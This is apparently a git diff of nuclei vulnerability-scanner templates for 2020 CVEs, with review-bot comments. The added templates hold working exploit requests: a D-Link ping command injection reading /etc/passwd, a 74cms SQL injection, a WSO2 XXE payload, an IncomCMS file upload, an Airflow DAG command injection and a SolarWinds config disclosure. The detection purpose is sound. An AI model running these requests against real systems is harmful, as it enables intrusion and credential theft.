html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 + Content-Type: application/x-www-form-urlencoded + Connection: close + Referer: http://{{Hostname}}/login_pic.asp + Cookie: uid=1234123 + Upgrade-Insecure-Requests: 1 + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 + 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 + Content-Type: application/x-www-form-urlencoded + Connection: close + Referer: http://{{Hostname}}/login_pic.asp + Cookie: uid=1234123 + Upgrade-Insecure-Requests: 1 + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + part: body + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-16952.yaml b/nuclei-templates/CVE-2020/CVE-2020-16952.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16952.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16952.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-17456.yaml b/nuclei-templates/CVE-2020/CVE-2020-17456.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17456.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17456.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-17505.yaml b/nuclei-templates/CVE-2020/CVE-2020-17505.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17505.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17505.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-17506.yaml b/nuclei-templates/CVE-2020/CVE-2020-17506.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17506.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17506.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-18268.yaml b/nuclei-templates/CVE-2020/CVE-2020-18268.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-18268.yaml rename to nuclei-templates/CVE-2020/CVE-2020-18268.yaml 
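Review bot: The file is added as `CVE-2020/CVE-2020-16920.yaml` but its `id` is `cve-2019-16920`, and the D-Link PingTest command injection it describes is CVE-2019-16920, so the template is filed under the wrong year and the id/filename convention will not hold. Move it to `CVE-2019/CVE-2019-16920.yaml` with `id: CVE-2019-16920`. The reference exists only as a `#` comment and there is no `tags` or `classification` block, so nuclei will emit none of that metadata; lift the URL into `reference:` and add at least `tags: cve,cve2019,dlink,rce,router`. The third request runs `type C:\Windows\win.ini` against what are embedded Linux routers and is unlikely ever to succeed; it doubles the traffic for no gain and could be dropped.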
diff --git a/nuclei-templates/CVE-2020/cve-2020-19295.yaml b/nuclei-templates/CVE-2020/CVE-2020-19295.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-19295.yaml rename to nuclei-templates/CVE-2020/CVE-2020-19295.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-1938.yaml b/nuclei-templates/CVE-2020/CVE-2020-1938.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-1938.yaml rename to nuclei-templates/CVE-2020/CVE-2020-1938.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-1943.yaml b/nuclei-templates/CVE-2020/CVE-2020-1943.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-1943.yaml rename to nuclei-templates/CVE-2020/CVE-2020-1943.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-19625.yaml b/nuclei-templates/CVE-2020/CVE-2020-19625.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-19625.yaml rename to nuclei-templates/CVE-2020/CVE-2020-19625.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-2103.yaml b/nuclei-templates/CVE-2020/CVE-2020-2103.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-2103.yaml rename to nuclei-templates/CVE-2020/CVE-2020-2103.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-2140.yaml b/nuclei-templates/CVE-2020/CVE-2020-2140.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-2140.yaml rename to nuclei-templates/CVE-2020/CVE-2020-2140.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-22211.yaml b/nuclei-templates/CVE-2020/CVE-2020-22211.yaml new file mode 100644 index 0000000000..a711842702 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-22211.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2020-22211 +info: + name: 74cms - ajax_street.php 'key' SQL Injection + author: ritikchaddha + severity: critical + description: | + SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. + reference: + - https://github.com/blindkey/cve_like/issues/13 + - https://nvd.nist.gov/vuln/detail/CVE-2020-22211 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-22210 + cwe-id: CWE-89 + metadata: + fofa-query: app="74cms" + shodan-query: http.html:"74cms" + tags: cve,cve2020,74cms,sqli +variables: + num: "999999999" +requests: + - method: GET + path: + - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23' + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + +# Enhanced by cs on 2022/06/21 diff --git a/nuclei-templates/CVE-2020/cve-2020-22840.yaml b/nuclei-templates/CVE-2020/CVE-2020-22840.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-22840.yaml rename to nuclei-templates/CVE-2020/CVE-2020-22840.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-23015.yaml b/nuclei-templates/CVE-2020/CVE-2020-23015.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-23015.yaml rename to nuclei-templates/CVE-2020/CVE-2020-23015.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24589.yaml b/nuclei-templates/CVE-2020/CVE-2020-24589.yaml new file mode 100644 index 0000000000..d38bafb820 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-24589.yaml 
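Review bot: `classification.cve-id` is `CVE-2020-22210` while the template `id`, `name` and NVD reference all say CVE-2020-22211, so the structured metadata points at a different vulnerability; the deleted lowercase copy had the same typo and the rename carries it over unchanged. Set `cve-id: CVE-2020-22211`. The body-only match on `md5(999999999)` is an acceptable low-false-positive oracle, since that digest will not appear in a normal page, so the missing status matcher is not a problem.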
@@ -0,0 +1,38 @@ +id: CVE-2020-24589 + +info: + name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection + author: lethargynavigator + severity: critical + description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. + reference: + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 + - https://nvd.nist.gov/vuln/detail/CVE-2020-24589 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H + cvss-score: 9.1 + cve-id: CVE-2020-24589 + tags: cve,cve2020,wso2,xxe,oast,blind + +requests: + - raw: + - | + POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + payload=<%3fxml+version%3d"1.0"+%3f>%25xxe%3b]> + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "Failed to install the generic artifact type" + +# Enhanced by mp on 2022/04/14 diff --git a/nuclei-templates/CVE-2020/cve-2020-24765.yaml b/nuclei-templates/CVE-2020/CVE-2020-24765.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-24765.yaml rename to nuclei-templates/CVE-2020/CVE-2020-24765.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-25495.yaml b/nuclei-templates/CVE-2020/CVE-2020-25495.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-25495.yaml rename to nuclei-templates/CVE-2020/CVE-2020-25495.yaml 
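Review bot: The `payload=` body as shown contains no `{{interactsh-url}}` and no DOCTYPE declaring the `xxe` parameter entity it references — it reads `<%3fxml+version%3d"1.0"+%3f>%25xxe%3b]>` — yet the first matcher requires `interactsh_protocol` to contain `http`, so as written the template can never produce the OAST callback it matches on. If the DOCTYPE was lost when the diff was rendered this is only a display artifact, but it should be verified against the committed file, because the deleted lowercase copy shows the same truncated payload. The `classification` block also lacks `cwe-id: CWE-611`, which the other CVE templates in this commit carry for their weakness class.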
diff --git a/nuclei-templates/CVE-2020/cve-2020-25540.yaml b/nuclei-templates/CVE-2020/CVE-2020-25540.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-25540.yaml rename to nuclei-templates/CVE-2020/CVE-2020-25540.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-26073.yaml b/nuclei-templates/CVE-2020/CVE-2020-26073.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-26073.yaml rename to nuclei-templates/CVE-2020/CVE-2020-26073.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-26153.yaml b/nuclei-templates/CVE-2020/CVE-2020-26153.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-26153.yaml rename to nuclei-templates/CVE-2020/CVE-2020-26153.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-26214.yaml b/nuclei-templates/CVE-2020/CVE-2020-26214.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-26214.yaml rename to nuclei-templates/CVE-2020/CVE-2020-26214.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-27866.yaml b/nuclei-templates/CVE-2020/CVE-2020-27866.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-27866.yaml rename to nuclei-templates/CVE-2020/CVE-2020-27866.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-29227.yaml b/nuclei-templates/CVE-2020/CVE-2020-29227.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-29227.yaml rename to nuclei-templates/CVE-2020/CVE-2020-29227.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-29395.yaml b/nuclei-templates/CVE-2020/CVE-2020-29395.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-29395.yaml rename to nuclei-templates/CVE-2020/CVE-2020-29395.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-29597.yaml b/nuclei-templates/CVE-2020/CVE-2020-29597.yaml new file mode 100644 index 0000000000..839ed954e9 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-29597.yaml 
@@ -0,0 +1,49 @@ +id: CVE-2020-29597 +info: + name: IncomCMS 2.0 - Arbitrary File Upload + author: princechaddha + severity: critical + description: | + IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. + reference: + - https://github.com/Trhackno/CVE-2020-29597 + - https://nvd.nist.gov/vuln/detail/CVE-2020-29597 + - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md + - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-29597 + cwe-id: CWE-434 + metadata: + verified: "true" + tags: cve,cve2020,incomcms,fileupload,intrusive +requests: + - raw: + - | + POST /incom/modules/uploader/showcase/script.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt + + ------WebKitFormBoundaryBEJZt0IK73M2mAbt + Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png" + Content-Type: text/html + + {{randstr_2}} + ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- + - | + GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1 + Host: {{Hostname}} + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '{"status":"1","name":"{{randstr_1}}.png"}' + - type: word + part: body_2 + words: + - '{{randstr_2}}' + +# Enhanced by CS 06/06/2022 diff --git a/nuclei-templates/CVE-2020/CVE-2020-35234.yaml b/nuclei-templates/CVE-2020/CVE-2020-35234.yaml deleted file mode 100644 index 36cb1b2d23..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-35234.yaml +++ /dev/null 
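Review bot: The template uploads `{{randstr_1}}.png` to `/upload/userfiles/image/` and nothing removes it afterwards, so every scan leaves a new attacker-named file in the target's web root; the `intrusive` tag is correct, but the `description` should say so for whoever runs it. Suggested addition under `description`: `Note: the check uploads a harmless random-named .png under /upload/userfiles/image/ and does not delete it; remove it after testing.` Minor: `verified: "true"` is a quoted string while the other templates in this set use the bare boolean `true`.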
@@ -1,30 +0,0 @@ -id: CVE-2020-35234 - -info: - name: SMTP WP Plugin Directory Listing - author: PR3R00T - severity: high - description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. - remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 - - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ - tags: cve,cve2020,wordpress,wp-plugin,smtp - classification: - cve-id: CVE-2020-35234 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" - - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/" - - matchers: - - type: word - words: - - "debug" - - "log" - - "Index of" - condition: and - -# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/CVE-2020/cve-2020-35338.yaml b/nuclei-templates/CVE-2020/CVE-2020-35338.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35338.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35338.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35580.yaml b/nuclei-templates/CVE-2020/CVE-2020-35580.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35580.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35580.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35598.yaml b/nuclei-templates/CVE-2020/CVE-2020-35598.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35598.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35598.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35713.yaml b/nuclei-templates/CVE-2020/CVE-2020-35713.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35713.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35713.yaml 
diff --git a/nuclei-templates/CVE-2020/cve-2020-35749.yaml b/nuclei-templates/CVE-2020/CVE-2020-35749.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35749.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35749.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35847.yaml b/nuclei-templates/CVE-2020/CVE-2020-35847.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35847.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35847.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-36287.yaml b/nuclei-templates/CVE-2020/CVE-2020-36287.yaml new file mode 100644 index 0000000000..8e5e71f48c --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-36287.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2020-36287 +info: + name: Jira Dashboard Gadgets / Information Disclosure + author: Jafar_Abo_Nada + severity: medium + description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. + tags: cve,cve2020,jira,atlassian,disclosure + reference: | + - https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116 + - https://nvd.nist.gov/vuln/detail/CVE-2020-36287 + # On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs +requests: + - raw: + - | + GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + - | + GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "contains(body_1, '')" + - "status_code_2 != 401" + condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-36289.yaml b/nuclei-templates/CVE-2020/CVE-2020-36289.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-36289.yaml rename to nuclei-templates/CVE-2020/CVE-2020-36289.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-5775.yaml b/nuclei-templates/CVE-2020/CVE-2020-5775.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5775.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5775.yaml 
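Review bot: `contains(body_1, '')` is always true, so the DSL matcher reduces to `status_code_1 == 200` and `status_code_2 != 401`; any host that answers 200 for the first prefs URL and anything but 401 (a 404, a login redirect) for the second will be reported as vulnerable. Replace the empty-string check with something the unauthenticated prefs response actually contains — if it is JSON, as the `/rest/` path suggests, `contains(all_headers_1, 'application/json')` — and tighten the second condition to `status_code_2 == 200`. Separately, `reference: |` turns the two URLs into one literal string with leading dashes rather than a YAML list; drop the `|` so they are proper list items and the `#` note becomes a real comment.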
diff --git a/nuclei-templates/CVE-2020/cve-2020-5776.yaml b/nuclei-templates/CVE-2020/CVE-2020-5776.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5776.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5776.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-5777.yaml b/nuclei-templates/CVE-2020/CVE-2020-5777.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5777.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5777.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-5902.yaml b/nuclei-templates/CVE-2020/CVE-2020-5902.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5902.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5902.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-6171.yaml b/nuclei-templates/CVE-2020/CVE-2020-6171.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-6171.yaml rename to nuclei-templates/CVE-2020/CVE-2020-6171.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7246.yaml b/nuclei-templates/CVE-2020/CVE-2020-7246.yaml deleted file mode 100644 index cafcede422..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-7246.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: CVE-2020-7246 -info: - name: qdPM Authenticated Remote Code Execution - author: medbsq - severity: high -requests: - - method: GET - path: - - "{{BaseURL}}/qdPM/" - - "{{BaseURL}}/" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers: - - type: word - words: - - "qdPM 9." - part: body - # https://www.cvebase.com/cve/2020/7246 diff --git a/nuclei-templates/CVE-2020/cve-2020-8115.yaml b/nuclei-templates/CVE-2020/CVE-2020-8115.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8115.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8115.yaml 
diff --git a/nuclei-templates/CVE-2020/cve-2020-8194.yaml b/nuclei-templates/CVE-2020/CVE-2020-8194.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8194.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8194.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8654.yaml b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml new file mode 100644 index 0000000000..83629c7d1c --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-8654 +info: + name: EyesOfNetwork 5.3 - Authenticated RCE + author: praetorian-thendrickson + severity: high + description: EyesOfNetwork version 5.1-5.3 is vulnerable to multiple exploits. Version 5.3 is vulnerable to CVE-2020-8654 (authenticated rce), CVE-2020-8655 (privesc), CVE-2020-8656 (SQLi - API version before 2.4.2), and 2020-8657 (hardcoded api key). Versions 5.1-5.3 are vulnerable to CVE-2020-9465 (SQLi). + reference: + - https://github.com/h4knet/eonrce + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb + - https://nvd.nist.gov/vuln/detail/CVE-2020-8657 + - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-8654 + cwe-id: CWE-78 + tags: cve,cve2020,cisa,eyesofnetwork,rce,authenticated +requests: + - method: GET + path: + - "{{BaseURL}}/css/eonweb.css" + extractors: + - type: regex + name: version + internal: true + part: body + group: 1 + regex: + - '# VERSION : ([0-9.]+)' + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(version, '< 5.4', '>= 5.1') + - type: word + part: body + words: + - "EyesOfNetwork" + - type: status + status: + - 200 
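Review bot: This template only reads a `# VERSION :` comment out of `/css/eonweb.css` and compares it against `>= 5.1, < 5.4`; it never touches the authenticated autodiscovery RCE, so the name `Authenticated RCE`, the `rce` tag and `severity: high` describe the CVE rather than what the check proves. Add to `description`: `Detection is version-based only (reads the VERSION banner from eonweb.css) and does not confirm exploitability.` The NVD link points at `CVE-2020-8657` while `cve-id` is `CVE-2020-8654`; use `https://nvd.nist.gov/vuln/detail/CVE-2020-8654` so the reference matches the id.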
diff --git a/nuclei-templates/CVE-2020/cve-2020-9402.yaml b/nuclei-templates/CVE-2020/CVE-2020-9402.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-9402.yaml rename to nuclei-templates/CVE-2020/CVE-2020-9402.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-10124.yaml b/nuclei-templates/CVE-2020/cve-2020-10124.yaml new file mode 100644 index 0000000000..a8142579c3 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-10124.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-10124 + +info: + name: SolarWindsOrion LFI + author: medbsq + severity: medium +#- https://www.cvebase.com/cve/2019/11043 + +requests: + - method: GET + path: + - "{{BaseURL}}/web.config.i18n.ashx?l=j&v=j" + - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=j&v=j" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + matchers-condition: and + matchers: + - type: word + words: + - "SolarWinds.Orion.Core.Common." + - "Connection String" + condition: or + part: body + - type: word + words: + - "text/plain" + - "SolarWindsOrionDatabaseUser" + condition: or + part: header + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-11530.yaml b/nuclei-templates/CVE-2020/cve-2020-11530.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-11530.yaml rename to nuclei-templates/CVE-2020/cve-2020-11530.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-11930.yaml b/nuclei-templates/CVE-2020/cve-2020-11930.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-11930.yaml rename to nuclei-templates/CVE-2020/cve-2020-11930.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-11978.yaml b/nuclei-templates/CVE-2020/cve-2020-11978.yaml new file mode 100644 index 0000000000..6233422e44 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-11978.yaml 
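Review bot: The only reference is a commented-out `#- https://www.cvebase.com/cve/2019/11043`, which is CVE-2019-11043 (an unrelated PHP-FPM issue), and the template has no `description`, `reference` or `classification` block, so nothing in the output tells an operator what CVE-2020-10124 is or why reading `web.config` via `.i18n.ashx` demonstrates it. Move a correct URL into `reference:` (at minimum `https://nvd.nist.gov/vuln/detail/CVE-2020-10124`) and add a one-line description. Worth flagging in that description: a positive result returns the Orion `web.config`, which the matcher itself expects to contain a `Connection String`, so scan output from this template should be treated as credential material. The file is also added as lowercase `cve-2020-10124.yaml` in a commit that renames dozens of siblings to the `CVE-` prefix while other renames below go the opposite way, leaving the directory with mixed casing.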
@@ -0,0 +1,60 @@ +id: CVE-2020-11978 +info: + name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution + author: pdteam + severity: high + description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. + reference: + - https://github.com/pberba/CVE-2020-11978 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 + - https://twitter.com/wugeej/status/1400336603604668418 + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-11978 + cwe-id: CWE-77 + +requests: + - raw: + - | + GET /api/experimental/test HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"conf": {"message": "\"; touch test #"}} + + - | + GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + + extractors: + - type: regex + name: exec_date + part: body + group: 1 + internal: true + regex: + - '"execution_date":"([0-9-A-Z:+]+)"' + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_4, "operator":"BashOperator")' + - 'contains(all_headers_4, "application/json")' + condition: and \ No newline at end of file 
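Review bot: The check is state-changing: request 2 un-pauses `example_trigger_target_dag` on the target and request 3 triggers a real DAG run whose injected `touch test` executes on the Airflow worker, leaving a file and a persistent dag_run behind, yet there is no `tags` line at all and in particular no `intrusive` marker. Add `tags: cve,cve2020,airflow,rce,intrusive` and a description note that the DAG is left un-paused and a run is created. The `exec_date` extracted from the POST response is inserted into the path of request 4 unencoded; ISO timestamps with an offset contain `+`, so `{{url_encode(exec_date)}}` is the safer form — how the server parses a raw `+` there is not certain from this file and should be checked against the referenced PoC.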
diff --git a/nuclei-templates/CVE-2020/CVE-2020-11991.yaml b/nuclei-templates/CVE-2020/cve-2020-11991.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-11991.yaml rename to nuclei-templates/CVE-2020/cve-2020-11991.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-12271.yaml b/nuclei-templates/CVE-2020/cve-2020-12271.yaml new file mode 100644 index 0000000000..f32824b493 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-12271.yaml @@ -0,0 +1,18 @@ +id: CVE-2020-12271 + +info: + name: Sophos XG Firewall Pre-Auth SQL Injection + author: medbsq + severity: critical +#https://www.cvebase.com/cve/2020/12271 +requests: + - method: GET + path: + - "{{BaseURL}}/userportal/webpages/myaccount/login.jsp" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + matchers: + - type: word + words: + - "loginstylesheet" + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-12447.yaml b/nuclei-templates/CVE-2020/cve-2020-12447.yaml new file mode 100644 index 0000000000..bf3bf2f717 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-12447.yaml 
